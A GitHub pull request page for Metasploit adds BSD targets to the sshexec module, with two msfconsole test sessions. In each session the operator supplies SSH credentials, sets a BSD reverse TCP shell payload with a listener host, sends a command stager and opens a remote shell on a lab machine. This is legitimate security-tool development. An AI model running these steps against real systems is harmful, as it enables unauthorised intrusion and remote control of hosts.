Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add BSD targets to exploit/multi/ssh/sshexec module #11805

Merged
merged 1 commit into from May 20, 2019

Conversation

Projects
None yet
3 participants
@bcoles
Copy link
Contributor

commented May 2, 2019

Add BSD targets to exploit/multi/ssh/sshexec module.

printf works out of the box. wget and curl listed for consistency (not installed by default).

#10917 (comment)

FreeBSD 8.0-RELEASE (amd64)

msf5 > use exploit/multi/ssh/sshexec 
msf5 exploit(multi/ssh/sshexec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux x86
   1   Linux x64
   2   Linux armle
   3   Linux mipsle
   4   Linux mipsbe
   5   Linux aarch64
   6   OSX x86
   7   OSX x64
   8   BSD x86
   9   BSD x64
   10  Python
   11  Unix Cmd


msf5 exploit(multi/ssh/sshexec) > set target 9
target => 9
msf5 exploit(multi/ssh/sshexec) > set rhosts 172.16.191.239
rhosts => 172.16.191.239
msf5 exploit(multi/ssh/sshexec) > set payload bsd/x64/shell_reverse_tcp
payload => bsd/x64/shell_reverse_tcp
msf5 exploit(multi/ssh/sshexec) > set username user
username => user
msf5 exploit(multi/ssh/sshexec) > set password password
password => password
msf5 exploit(multi/ssh/sshexec) > run

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/ssh/sshexec) > set lhost 172.16.191.165 
lhost => 172.16.191.165
msf5 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.239:22 - Sending stager...
[*] Command Stager progress -  70.00% done (497/710 bytes)
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.239:57316) at 2019-05-02 16:18:52 -0400
[-] SSH Timeout Exception will say the Exploit Failed; do not believe it.
[+] You will likely still get a shell; run sessions -l to be sure.
[*] Command Stager progress - 100.00% done (710/710 bytes)
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf5 exploit(multi/ssh/sshexec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1001(user) gid=1001(user) groups=1001(user)
uname -a
FreeBSD freebsd-8-0-amd64.local 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

@space-r7 space-r7 self-assigned this May 20, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

commented May 20, 2019

Tested on FreeBSD 8.0:

msf5 > use exploit/multi/ssh/sshexec 
msf5 exploit(multi/ssh/sshexec) > set rhosts 172.16.215.135
rhosts => 172.16.215.135
msf5 exploit(multi/ssh/sshexec) > set username a_user
username => a_user
msf5 exploit(multi/ssh/sshexec) > set password password
password => password
msf5 exploit(multi/ssh/sshexec) > set target 9
target => 9
msf5 exploit(multi/ssh/sshexec) > set payload bsd/x86/shell/reverse_tcp
payload => bsd/x86/shell/reverse_tcp
msf5 exploit(multi/ssh/sshexec) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] 172.16.215.135:22 - Sending stager...
[*] Sending stage (46 bytes) to 172.16.215.135
[*] Command shell session 1 opened (172.16.215.1:4444 -> 172.16.215.135:40392) at 2019-05-20 14:10:08 -0500
[-] SSH Timeout Exception will say the Exploit Failed; do not believe it.
[+] You will likely still get a shell; run sessions -l to be sure.
[*] Command Stager progress - 100.00% done (432/432 bytes)
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf5 exploit(multi/ssh/sshexec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1001(a_user) gid=1001(a_user) groups=1001(a_user),0(wheel)
uname -a
FreeBSD nostromo.localdomain 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009     root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

@space-r7 space-r7 merged commit 60fb3b2 into rapid7:master May 20, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

space-r7 added a commit that referenced this pull request May 20, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

commented May 20, 2019

Release Notes

This adds BSD targets to the exploit/multi/ssh/sshexec module.

@bcoles bcoles deleted the bcoles:sshexec branch May 20, 2019

msjenkins-r7 added a commit that referenced this pull request May 20, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.